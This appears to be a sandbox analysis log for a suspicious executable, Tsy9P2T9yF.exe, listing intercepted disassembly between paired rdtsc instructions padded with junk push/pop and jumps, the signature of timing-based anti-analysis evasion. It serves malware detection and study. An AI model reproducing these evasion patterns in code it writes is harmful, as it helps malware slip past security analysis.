Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C83A2E second address: C83A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007F804CF71E89h 0x0000000e pushad 0x0000000f jmp 00007F804CF71E7Fh 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 nop 0x00000018 mov cl, D5h 0x0000001a push 0000001Eh 0x0000001c push edx 0x0000001d push edx 0x0000001e call 00007F804CF71E7Eh 0x00000023 pop edx 0x00000024 pop ecx 0x00000025 pop edx 0x00000026 add edi, 6F9CB1F9h 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jl 00007F804CF71E76h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: C3111A second address: C31137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jl 00007F804C8F2D96h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007F804C8F2D96h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD0353 second address: CD0357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD342C second address: CD3432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD3432 second address: CD3442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007F804CF71E78h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD35B8 second address: CD35F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F804C8F2DA9h 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jnl 00007F804C8F2D96h 0x00000015 jmp 00007F804C8F2DA0h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD38A7 second address: CD38C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F804CF71E76h 0x0000000a jmp 00007F804CF71E83h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD38C4 second address: CD38CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD3D32 second address: CD3D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F804CF71E83h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD3D5A second address: CD3D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD9314 second address: CD9318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD9478 second address: CD947C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD947C second address: CD949C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E86h 0x00000007 ja 00007F804CF71E76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD95EB second address: CD95F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F804C8F2D96h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CD9E72 second address: CD9E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CDA6E8 second address: CDA6ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CDA6ED second address: CDA6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CDAFDA second address: CDAFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CDAFE0 second address: CDB008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F804CF71E80h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F804CF71E7Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CE1EFB second address: CE1F5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F804C8F2DA3h 0x0000000e jmp 00007F804C8F2DA8h 0x00000013 pop ebx 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 pop edx 0x00000018 popad 0x00000019 pushad 0x0000001a jns 00007F804C8F2DA0h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F804C8F2DA5h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CE1F5D second address: CE1F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F804CF71E76h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CE4F2E second address: CE4F32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CE52F9 second address: CE5319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F804CF71E7Dh 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CE5319 second address: CE5327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F804C8F2D96h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CE5487 second address: CE549B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F804CF71E7Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CE549B second address: CE54AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jng 00007F804C8F2D96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CE54AA second address: CE54B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe RDTSC instruction interceptor: First address: CE55DF second address: CE55FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F804C8F2D96h 0x0000000a pop edx 0x0000000b jnp 00007F804C8F2DA2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE55FC second address: CE5636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007F804CF71E88h 0x00000010 jmp 00007F804CF71E82h 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007F804CF71E76h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE57AE second address: CE57B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE57B4 second address: CE57D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F804CF71E78h 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F804CF71E7Fh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CE57D7 second address: CE57E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEDEB8 second address: CEDEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEDEBE second address: CEDEC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEDEC9 second address: CEDED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEDED8 second address: CEDF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jns 00007F804C8F2D96h 0x0000000c jmp 00007F804C8F2DA8h 0x00000011 je 00007F804C8F2D96h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEC1E6 second address: CEC1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F804CF71E76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEC33B second address: CEC365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F804C8F2D96h 0x0000000a popad 0x0000000b jns 00007F804C8F2DAFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEC365 second address: CEC382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804CF71E84h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEC613 second address: CEC617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CECF55 second address: CECF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804CF71E89h 0x00000009 pop esi 0x0000000a js 00007F804CF71E7Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CECF7B second address: CECF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007F804C8F2D9Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CECF8F second address: CECF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 ja 00007F804CF71E76h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CEDD6C second address: CEDD72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CF101E second address: CF1024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CF1024 second address: CF1042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F804C8F2DA6h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CF5DCA second address: CF5DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C3CDE2 second address: C3CDE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D02257 second address: D0225B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D023CE second address: D023E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2DA1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D082DD second address: D082EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F804CF71E76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D082EC second address: D08309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D08309 second address: D08312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D08312 second address: D08318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D0846C second address: D08485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Dh 0x00000007 jc 00007F804CF71E7Eh 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D09EF3 second address: D09EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D09EF7 second address: D09F0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E81h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D09F0C second address: D09F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 ja 00007F804C8F2D96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D09F1B second address: D09F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D0FD17 second address: D0FD20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D1655B second address: D16599 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804CF71E81h 0x00000008 ja 00007F804CF71E76h 0x0000000e jl 00007F804CF71E76h 0x00000014 popad 0x00000015 push ecx 0x00000016 jp 00007F804CF71E76h 0x0000001c pop ecx 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jp 00007F804CF71E76h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D16599 second address: D1659D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D1659D second address: D165AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D165AF second address: D165C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804C8F2D9Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D1FE45 second address: D1FE51 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D1FE51 second address: D1FE57 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D1FE57 second address: D1FE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F804CF71E8Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D200E7 second address: D200ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D200ED second address: D200F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D200F3 second address: D20113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 js 00007F804C8F2D9Eh 0x0000000d push edi 0x0000000e pop edi 0x0000000f jo 00007F804C8F2D96h 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007F804C8F2D98h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D20113 second address: D20119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D20299 second address: D2029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D2029F second address: D202A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D202A3 second address: D202A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D202A7 second address: D202BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D20DFF second address: D20E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007F804C8F2D96h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D20E10 second address: D20E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D20E14 second address: D20E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D253BF second address: D253C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D24FC1 second address: D24FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D64520 second address: D64555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804CF71E88h 0x00000009 popad 0x0000000a jmp 00007F804CF71E82h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D64555 second address: D64583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Eh 0x00000007 jns 00007F804C8F2D96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F804C8F2DA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D64583 second address: D64588 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D64588 second address: D6459D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F804C8F2D96h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F804C8F2D96h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D65C35 second address: D65C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E89h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D65C58 second address: D65C64 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F804C8F2D96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C2F5B5 second address: C2F5C1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F804CF71E7Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: D77A41 second address: D77A4B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F804C8F2D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3BE42 second address: E3BE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: E3BE48 second address: E3BE56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F804C8F2D98h 0x0000000c rdtsc
